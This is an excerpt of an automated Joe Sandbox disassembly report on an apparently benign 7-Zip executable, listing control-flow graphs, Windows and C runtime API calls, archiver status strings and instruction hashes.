                                                                                                                                        control_flow_graph 3245 26ab74-26aba4 3246 26aba6 3245->3246 3247 26abd3-26abf5 3245->3247 3248 26abaa-26abbc 3246->3248 3249 26ae31-26ae78 call 2683c8 call 2431c0 call 26a7fc free 3247->3249 3250 26abfb 3247->3250 3252 26abce-26abd1 3248->3252 3253 26abbe-26abc9 call 2694a8 free 3248->3253 3268 26ae7f-26ae87 3249->3268 3269 26ae7a 3249->3269 3254 26ac02-26acba call 243208 call 243518 call 243208 * 2 3250->3254 3252->3247 3252->3248 3253->3252 3277 26acc6-26accd 3254->3277 3278 26acbc-26acc1 call 243518 3254->3278 3272 26ae99-26aeca call 2431c0 call 26a9fc free 3268->3272 3273 26ae89-26ae94 call 24339c 3268->3273 3271 26af7a-26af99 free 3269->3271 3287 26aed1-26aeee call 2431c0 call 26a9fc 3272->3287 3288 26aecc 3272->3288 3273->3272 3281 26accf-26acd4 call 243518 3277->3281 3282 26acd9-26ad35 call 269d98 free * 2 3277->3282 3278->3277 3281->3282 3290 26ad37-26ad4c call 26a034 3282->3290 3291 26ad51-26ad61 call 242130 3282->3291 3302 26aef3-26af02 free 3287->3302 3288->3271 3299 26addd-26adf2 call 242130 3290->3299 3300 26ad63-26ad6a 3291->3300 3301 26ad6c 3291->3301 3311 26adf4-26ae01 call 269af0 3299->3311 3312 26ae03 3299->3312 3304 26ad6f-26ad8b call 24b8f0 3300->3304 3301->3304 3305 26af06-26af10 3302->3305 3306 26af04 3302->3306 3317 26adbd-26adc0 3304->3317 3318 26ad8d-26ad93 3304->3318 3309 26af12-26af16 3305->3309 3310 26af18-26af1b 3305->3310 3306->3271 3314 26af2a-26af2e 3309->3314 3310->3314 3315 26af1d-26af24 3310->3315 3319 26ae06-26ae2b call 24b8f0 call 2694a8 3311->3319 3312->3319 3321 26af77 3314->3321 3322 26af30-26af36 3314->3322 3315->3314 3320 26af26 3315->3320 3323 26adc2-26add3 memmove 3317->3323 3324 26adda 3317->3324 3326 26ad95-26ad9a free 3318->3326 3327 26ada1-26adac 3318->3327 3319->3249 3319->3254 3320->3314 3321->3271 3322->3321 3329 26af38 3322->3329 3323->3299 3324->3299 3326->3327 3331 26add5-26add8 3327->3331 3332 26adae-26adb9 call 242130 3327->3332 3330 26af3b-26af5a GetProcAddress 3329->3330 3334 26af66-26af6f 3330->3334 3335 26af5c-26af64 3330->3335 3331->3299 3332->3317 3334->3330 3340 26af71 3334->3340 3335->3334 3342 26af73-26af75 3335->3342 3340->3321 3342->3271
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 0026ABC9
                                                                                                                                        • free.MSVCRT ref: 0026ACF3
                                                                                                                                        • free.MSVCRT ref: 0026ACFE
                                                                                                                                        • free.MSVCRT ref: 0026AD95
                                                                                                                                        • memmove.MSVCRT(?), ref: 0026ADCB
                                                                                                                                        • free.MSVCRT ref: 0026AE70
                                                                                                                                        • free.MSVCRT ref: 0026AF7F
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694DB
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694E3
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694F0
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026951C
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 00269525
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026952D
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026953A
                                                                                                                                        • free.MSVCRT ref: 0026AEC2
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                          • Part of subcall function 0026A9FC: free.MSVCRT ref: 0026AA95
                                                                                                                                          • Part of subcall function 0026A9FC: free.MSVCRT ref: 0026AAC5
                                                                                                                                          • Part of subcall function 0026A9FC: free.MSVCRT ref: 0026AAD2
                                                                                                                                        • free.MSVCRT ref: 0026AEFA
                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0026AF4D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove$AddressProc
                                                                                                                                        • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                        • API String ID: 4053071709-2499791885
                                                                                                                                        • Opcode ID: 1ded6694db5e6cbcaba03ae8006ec5fd7bac4ba66ca018e912d44d13900c5b0e
                                                                                                                                        • Instruction ID: 465f0a4f4ea65eb5955d19d5d8a0630185d5db867e688a1fc1fcc1e40df0d997
                                                                                                                                        • Opcode Fuzzy Hash: 1ded6694db5e6cbcaba03ae8006ec5fd7bac4ba66ca018e912d44d13900c5b0e
                                                                                                                                        • Instruction Fuzzy Hash: 10B1A0662256C196CB20EF21E49036FB760F385788F504112EB8E57B65DF79C9B9CF02

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3343 281850-281886 EnterCriticalSection 3344 281888-28188e call 28b1c8 3343->3344 3345 2818b1-2818bb 3343->3345 3352 281893-2818ac 3344->3352 3346 2818bd call 2422e4 3345->3346 3347 2818c2-2818c4 3345->3347 3346->3347 3350 2818ca-2818d2 3347->3350 3351 281991-28199e 3347->3351 3353 28191a-28192b 3350->3353 3354 2818d4-2818da 3350->3354 3355 281a4e-281a57 LeaveCriticalSection 3351->3355 3356 2819a4-2819a7 3351->3356 3352->3345 3360 28196a-281974 3353->3360 3361 28192d-28193a call 242300 3353->3361 3354->3353 3357 2818dc-2818e2 3354->3357 3358 281a59-281a62 3355->3358 3356->3355 3359 2819ad-2819b7 3356->3359 3364 2818ed 3357->3364 3365 2818e4-2818eb 3357->3365 3363 281a31-281a4c LeaveCriticalSection 3359->3363 3366 2819b9-2819d7 call 242300 fputs 3359->3366 3362 28197a-281981 3360->3362 3360->3363 3361->3360 3372 28193c-281965 fputs call 2426a0 call 242300 3361->3372 3362->3363 3369 281987-28198c call 2422e4 3362->3369 3363->3358 3370 2818f4-2818fe 3364->3370 3365->3370 3376 2819d9-2819f0 fputs 3366->3376 3377 2819f2-281a14 call 246618 call 242320 free 3366->3377 3369->3363 3370->3360 3374 281900-281913 fputs call 242300 3370->3374 3372->3360 3384 281918 3374->3384 3381 281a19-281a2c call 242300 call 2422e4 3376->3381 3377->3381 3381->3363 3384->3360
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00281877
                                                                                                                                        • fputs.MSVCRT ref: 0028190A
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00281A44
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        • fputs.MSVCRT ref: 0028194D
                                                                                                                                          • Part of subcall function 002426A0: fputs.MSVCRT ref: 002426C1
                                                                                                                                        • fputs.MSVCRT ref: 002819CB
                                                                                                                                        • fputs.MSVCRT ref: 002819EA
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00281A51
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        • free.MSVCRT ref: 00281A14
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                        • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                        • API String ID: 676172275-580504279
                                                                                                                                        • Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                        • Instruction ID: 20f9ea86e2789c655b4a57714691af5426b5048ef97de51000998ed9edbd9a67
                                                                                                                                        • Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                        • Instruction Fuzzy Hash: 6A519F2A326A82D2EB1DEF26D9A43AD6324F744B54F444122DF2E076D5CF78D4BAC700

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3392 2638e8-263977 call 261700 call 26373c memmove 3397 263992-2639a5 3392->3397 3398 263979-26398d call 263864 free 3392->3398 3399 263a30-263a3d call 263864 3397->3399 3400 2639ab 3397->3400 3408 263cb6-263cc9 3398->3408 3409 263a65-263a77 3399->3409 3410 263a3f-263a64 call 2602a0 _CxxThrowException 3399->3410 3403 2639ae-2639c2 3400->3403 3406 2639c4-2639ec call 2609e0 call 242130 3403->3406 3407 263a1d-263a25 3403->3407 3424 2639ee-2639f9 call 243314 3406->3424 3425 2639fb 3406->3425 3407->3403 3412 263a27-263a2b 3407->3412 3415 263ae1-263b27 call 275f5c call 2613e8 * 2 3409->3415 3416 263a79-263a7c 3409->3416 3410->3409 3412->3399 3439 263b2d-263b30 3415->3439 3440 263c2a-263c46 free 3415->3440 3420 263a7e-263aac call 243208 call 246e10 call 242130 3416->3420 3445 263aae-263abb call 243314 3420->3445 3446 263abd 3420->3446 3430 2639fe-263a16 call 24b8f0 free 3424->3430 3425->3430 3430->3407 3444 263b33-263b56 call 242130 3439->3444 3442 263c76-263c84 free 3440->3442 3443 263c48 3440->3443 3450 263c88-263c95 3442->3450 3449 263c4c-263c5f 3443->3449 3459 263b68 3444->3459 3460 263b58-263b66 call 243314 3444->3460 3448 263ac0-263adf call 24b8f0 free 3445->3448 3446->3448 3448->3415 3448->3420 3455 263c71-263c74 3449->3455 3456 263c61-263c6c free * 2 3449->3456 3457 263ca7-263caa 3450->3457 3458 263c97-263ca2 free * 2 3450->3458 3455->3442 3455->3449 3456->3455 3457->3450 3462 263cac-263cb4 free 3457->3462 3458->3457 3464 263b6b-263ba1 call 242130 3459->3464 3460->3464 3462->3408 3468 263bb3 3464->3468 3469 263ba3-263bb1 call 243314 3464->3469 3471 263bb6-263bc6 3468->3471 3469->3471 3473 263be4-263bf2 3471->3473 3474 263bc8-263be2 call 244338 3471->3474 3473->3444 3475 263bf8 3473->3475 3474->3473 3478 263bfa-263c29 call 2602a0 _CxxThrowException 3474->3478 3475->3440 3478->3440
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0026373C: free.MSVCRT ref: 002637FB
                                                                                                                                        • memmove.MSVCRT ref: 0026396F
                                                                                                                                        • free.MSVCRT ref: 00263986
                                                                                                                                        • free.MSVCRT ref: 00263A11
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00263A5F
                                                                                                                                        • free.MSVCRT ref: 00263AD3
                                                                                                                                          • Part of subcall function 00263864: free.MSVCRT ref: 00263877
                                                                                                                                          • Part of subcall function 00263864: free.MSVCRT ref: 00263892
                                                                                                                                          • Part of subcall function 00263864: free.MSVCRT ref: 0026389B
                                                                                                                                          • Part of subcall function 00263864: free.MSVCRT ref: 002638C6
                                                                                                                                          • Part of subcall function 00263864: free.MSVCRT ref: 002638CE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowmemmove
                                                                                                                                        • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                        • API String ID: 3934437811-2067063536
                                                                                                                                        • Opcode ID: 0e324b5fcf06ff74cfc01f68caaf0094b622985f8662e005eb2f461a138266bf
                                                                                                                                        • Instruction ID: 1187dede4e3ec4ab01b3846ef96c3025519ed8f294007bec8f59c39cadd2da39
                                                                                                                                        • Opcode Fuzzy Hash: 0e324b5fcf06ff74cfc01f68caaf0094b622985f8662e005eb2f461a138266bf
                                                                                                                                        • Instruction Fuzzy Hash: F3A17372735A8582CA20EF16E89065EB3A1F7C5B84F504512EF8E07B29DF78C9A5CF40

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3481 2742a2-2742c0 3483 2742d5-2742d8 3481->3483 3484 2742c2-2742d0 3481->3484 3485 2742e0-2743ab call 2640c4 memmove call 243404 call 273a20 3483->3485 3486 2742da 3483->3486 3484->3483 3494 2743b1-2743b3 3485->3494 3495 2745d8-27468f call 243404 * 3 free * 2 call 26419c 3485->3495 3486->3485 3496 2746c5-2746f4 free * 2 call 26419c 3494->3496 3497 2743b9-2743d7 call 26c684 3494->3497 3534 274691-274697 3495->3534 3535 274698-2746a0 3495->3535 3506 2746f6-2746fc 3496->3506 3507 2746fd-274705 3496->3507 3508 2743dd-2743ef call 242130 3497->3508 3509 274728-274757 free * 2 call 26419c 3497->3509 3506->3507 3512 274707-27470d 3507->3512 3513 27470e-274719 3507->3513 3524 274403 3508->3524 3525 2743f1-274401 call 26caac 3508->3525 3521 274760-274768 3509->3521 3522 274759-27475f 3509->3522 3512->3513 3519 274721-274723 3513->3519 3520 27471b 3513->3520 3527 2747fe-274811 3519->3527 3520->3519 3529 274771-27477c 3521->3529 3530 27476a-274770 3521->3530 3522->3521 3532 274406-274441 call 24b8f0 free * 2 call 26419c 3524->3532 3525->3532 3536 274784-274786 3529->3536 3537 27477e 3529->3537 3530->3529 3550 274443-274449 3532->3550 3551 27444a-274452 3532->3551 3534->3535 3541 2746a2-2746a8 3535->3541 3542 2746a9-2746b4 3535->3542 3536->3527 3543 2747f2-2747fb 3536->3543 3537->3536 3541->3542 3542->3543 3546 2746ba-2746c0 3542->3546 3543->3527 3546->3543 3550->3551 3553 274454-27445a 3551->3553 3554 27445b-27446c 3551->3554 3553->3554 3556 274472-274478 3554->3556 3557 273fa9-274033 memmove 3554->3557 3556->3557 3560 274035-274052 memmove 3557->3560 3561 274054-274072 memmove 3557->3561 3563 274078-2740e9 memmove call 26c0fc call 243404 * 2 call 273d58 3560->3563 3561->3543 3561->3563 3573 2740ee-2740f2 3563->3573 3574 27447d-274480 3573->3574 3575 2740f8-27410a call 242130 3573->3575 3576 274486-27450b call 243404 * 3 3574->3576 3577 27450c-27451b call 26419c 3574->3577 3583 27411e 3575->3583 3584 27410c-27411c call 26caac 3575->3584 3576->3577 3577->3527 3588 274121-27413a call 24b8f0 call 26419c 3583->3588 3584->3588
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-3916222277
                                                                                                                                        • Opcode ID: 9217f3ba69c3860f97dd2d0c7e0513805a01d2cb0f36f60198f80e75177fd356
                                                                                                                                        • Instruction ID: 83600e8e67ac0329dd4fb849d46c5fde4906de31d66b829b832e707419c97df1
                                                                                                                                        • Opcode Fuzzy Hash: 9217f3ba69c3860f97dd2d0c7e0513805a01d2cb0f36f60198f80e75177fd356
                                                                                                                                        • Instruction Fuzzy Hash: 93D14037219AC596CB25EF25E0902AEB760F7C6B44F544016DBCE43B69DF78C5A9CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$memmove
                                                                                                                                        • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                        • API String ID: 2879976980-73314117
                                                                                                                                        • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                        • Instruction ID: 419bd62c3a92335483d1b3801c72baa71b0d707138cfc53781757f549686902e
                                                                                                                                        • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                        • Instruction Fuzzy Hash: 0E418836225A42D6DB20DF21F88439DB3A5F784784F404126EB8E87768DF79C999CB00
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 00281CF9
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        • fputs.MSVCRT ref: 00281DEE
                                                                                                                                        • fputs.MSVCRT ref: 00281F07
                                                                                                                                        • fputs.MSVCRT ref: 00281F5C
                                                                                                                                          • Part of subcall function 0028171C: fputs.MSVCRT ref: 00281744
                                                                                                                                          • Part of subcall function 0028171C: fputs.MSVCRT ref: 00281758
                                                                                                                                          • Part of subcall function 0028171C: free.MSVCRT ref: 0028176B
                                                                                                                                          • Part of subcall function 00246618: FormatMessageW.KERNEL32 ref: 00246676
                                                                                                                                          • Part of subcall function 00246618: LocalFree.KERNEL32 ref: 00246698
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                        • free.MSVCRT ref: 00281F86
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                        • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                        • API String ID: 2553544393-24972044
                                                                                                                                        • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                        • Instruction ID: 3b8220bc7a6cba4acae173a79c8debee8b4c709abf04dc1adb9969501dd72a23
                                                                                                                                        • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                        • Instruction Fuzzy Hash: 38A19E6A721AC6DACA2DEF32D5903AD7724F754B84F444126EF5E07681CF68D8B6C700
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowfputs
                                                                                                                                        • String ID: Decoding ERROR
                                                                                                                                        • API String ID: 117389134-2585761706
                                                                                                                                        • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                        • Instruction ID: 5ef474ebe6ebeacec646f767e27440f8b3cc7db009934ce5fbf609a65951da04
                                                                                                                                        • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                        • Instruction Fuzzy Hash: 5331D0663369C181EA30BF25E8843AD63A1FB82790F845523DA5E57799DF38C8E5CB01
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00246464: FreeLibrary.KERNELBASE(?,?,?,002464E7), ref: 00246475
                                                                                                                                          • Part of subcall function 00243404: free.MSVCRT ref: 00243431
                                                                                                                                          • Part of subcall function 00243404: memmove.MSVCRT ref: 0024344C
                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0026A8CA
                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0026A8E8
                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0026A908
                                                                                                                                        • free.MSVCRT ref: 0026A985
                                                                                                                                        • free.MSVCRT ref: 0026A996
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                        • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                        • API String ID: 852969883-606380122
                                                                                                                                        • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                        • Instruction ID: 585b17b98bcb3a4e6677e29a120c8ae50e91c5457d773a5c4853f74ff7ed71a2
                                                                                                                                        • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                        • Instruction Fuzzy Hash: 8E41C126221B8186DF24EF26E84435E7360FB85B98F188520DF8E07765EF38D8D6CB01
                                                                                                                                        APIs
                                                                                                                                        • strcmp.MSVCRT ref: 0028B723
                                                                                                                                        • fputs.MSVCRT ref: 0028B743
                                                                                                                                          • Part of subcall function 002438C8: memmove.MSVCRT(0024A0E5), ref: 00243907
                                                                                                                                          • Part of subcall function 00243A64: memmove.MSVCRT ref: 00243AAA
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0028B49E
                                                                                                                                          • Part of subcall function 00243404: free.MSVCRT ref: 00243431
                                                                                                                                          • Part of subcall function 00243404: memmove.MSVCRT ref: 0024344C
                                                                                                                                        • strcmp.MSVCRT ref: 0028B4E3
                                                                                                                                        • wcscmp.MSVCRT ref: 0028B502
                                                                                                                                        • strcmp.MSVCRT ref: 0028B568
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                        • String ID: .
                                                                                                                                        • API String ID: 591578422-4150638102
                                                                                                                                        • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                        • Instruction ID: 3f8385a1b3ddeb05a5650ff8794af340b5c5749843309abfb4c27ea5d44a0488
                                                                                                                                        • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                        • Instruction Fuzzy Hash: B7A16F7B721685E7CB2AEF2AD69025D7361F744784F80801ADB5A47B51DF34E8B6CB00
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 00282F7E
                                                                                                                                        • fputs.MSVCRT ref: 00282F9D
                                                                                                                                        • free.MSVCRT ref: 00282FB6
                                                                                                                                        • free.MSVCRT ref: 00282FC1
                                                                                                                                          • Part of subcall function 00242C78: free.MSVCRT ref: 00242CAE
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                        • free.MSVCRT ref: 00282FCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
